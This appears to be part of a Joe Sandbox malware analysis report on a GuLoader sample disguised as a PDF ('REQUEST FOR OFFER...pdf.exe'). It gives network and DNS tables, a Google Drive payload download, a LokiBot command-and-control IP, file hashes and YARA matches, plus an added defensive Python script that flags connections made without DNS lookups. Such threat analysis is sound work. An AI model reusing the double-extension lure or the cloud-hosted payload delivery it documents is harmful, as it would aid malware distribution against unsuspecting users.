Nov 30, 2022 00:31:36.207990885 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.208270073 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.208506107 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.208565950 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.208812952 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.209053993 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.209290028 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.209343910 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.209602118 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.209661961 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.209861040 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.209897995 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.210105896 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.210390091 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.210585117 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.210622072 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 00:31:35.102749109 CET | 49240 | 53 | 192.168.11.20 | 1.1.1.1
Nov 30, 2022 00:31:35.111932993 CET | 53 | 49240 | 1.1.1.1 | 192.168.11.20
Nov 30, 2022 00:31:35.755490065 CET | 53919 | 53 | 192.168.11.20 | 1.1.1.1
Nov 30, 2022 00:31:35.793382883 CET | 53 | 53919 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 00:31:35.102749109 CET | 192.168.11.20 | 1.1.1.1 | 0x6df6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:31:35.755490065 CET | 192.168.11.20 | 1.1.1.1 | 0x3147 | Standard query (0) | doc-0g-8k-docs.googleusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 00:31:35.111932993 CET | 1.1.1.1 | 192.168.11.20 | 0x6df6 | No error (0) | drive.google.com | - | 142.250.185.238 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:31:35.793382883 CET | 1.1.1.1 | 192.168.11.20 | 0x3147 | No error (0) | doc-0g-8k-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 00:31:35.793382883 CET | 1.1.1.1 | 192.168.11.20 | 0x3147 | No error (0) | googlehosted.l.googleusercontent.com | - | 142.250.185.161 | A (IP address) | IN (0x0001) | false
                                • drive.google.com
                                • doc-0g-8k-docs.googleusercontent.com
                                • 157.245.36.27
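The two Google names above were resolved through 1.1.1.1 before the TLS connections to 142.250.185.238 and 142.250.185.161 (the GuLoader payload download from Google Drive), whereas 157.245.36.27, the LokiBot C2 from the Snort alerts, was contacted with no DNS lookup at all. As an added example (not Joe Sandbox code), the Python below correlates the report's DNS answers with its TCP connections, follows the CNAME chain, and reports destinations that were reached without a preceding resolution. The input lists are constructed from the DNS, TCP and Snort tables of this report.

```python
"""Correlate DNS answers with TCP connections from a sandbox run.

Added example, not Joe Sandbox code.  A destination reached without any
preceding DNS resolution is a classic direct-IP C2 indicator: here the
LokiBot traffic to 157.245.36.27:80 fits that pattern, while the Google
Drive download was reached through normal name resolution.
"""
from __future__ import annotations

from collections import defaultdict

# Constructed from the DNS answer table of this report: (owner, type, data).
DNS_ANSWERS = [
    ("drive.google.com", "A", "142.250.185.238"),
    ("doc-0g-8k-docs.googleusercontent.com", "CNAME", "googlehosted.l.googleusercontent.com"),
    ("googlehosted.l.googleusercontent.com", "A", "142.250.185.161"),
]

# Constructed from the TCP and Snort tables: (src port, dst ip, dst port).
TCP_CONNECTIONS = [
    (49836, "142.250.185.238", 443),
    (49837, "142.250.185.161", 443),
    (49838, "157.245.36.27", 80),
]


def resolve_chain(name: str, answers, _seen: set | None = None) -> set[str]:
    """Follow CNAMEs from `name` and return the A-record IPs the chain ends at."""
    seen = _seen if _seen is not None else set()
    if name in seen:            # guard against CNAME loops in hostile answers
        return set()
    seen.add(name)
    ips: set[str] = set()
    for owner, rtype, data in answers:
        if owner != name:
            continue
        if rtype == "A":
            ips.add(data)
        elif rtype == "CNAME":
            ips |= resolve_chain(data, answers, seen)
    return ips


def ip_to_names(answers) -> dict[str, set[str]]:
    """Map every resolved IP back to the name(s) the client actually queried.
    Names that appear only as CNAME targets are intermediate, not queries."""
    targets = {data for _, rtype, data in answers if rtype == "CNAME"}
    queried = [owner for owner, _, _ in answers if owner not in targets]
    mapping: dict[str, set[str]] = defaultdict(set)
    for name in dict.fromkeys(queried):   # de-duplicate, keep order
        for ip in resolve_chain(name, answers):
            mapping[ip].add(name)
    return mapping


def classify_connections(connections, answers) -> dict[str, list[str]]:
    """Return {dst_ip: sorted queried names}, or ['<no DNS lookup>'] for
    destinations that had no resolution at all before the connection."""
    names = ip_to_names(answers)
    result: dict[str, list[str]] = {}
    for _sport, dst_ip, _dport in connections:
        result[dst_ip] = sorted(names.get(dst_ip, set())) or ["<no DNS lookup>"]
    return result


if __name__ == "__main__":
    for dst_ip, names in classify_connections(TCP_CONNECTIONS, DNS_ANSWERS).items():
        print(f"{dst_ip:16} <- {', '.join(names)}")
```

On a real capture the same join is done over Zeek's dns.log and conn.log (or Suricata's eve.json); the extra care here is following CNAME chains, otherwise the googleusercontent.com connection would be misreported as DNS-less.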


Target ID: 2
Start time: 00:31:01
Start date: 30/11/2022
Path: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Imagebase: 0x400000
File size: 194987 bytes
MD5 hash: B9F70F4146B846179FA182AC868D0C15
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 5
Start time: 00:31:18
Start date: 30/11/2022
Path: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Imagebase: 0x400000
File size: 194987 bytes
MD5 hash: B9F70F4146B846179FA182AC868D0C15
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 8
Start time: 00:31:37
Start date: 30/11/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Imagebase: 0x520000
File size: 482640 bytes
MD5 hash: 40A149513D721F096DDF50C04DA2F01F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                No disassembly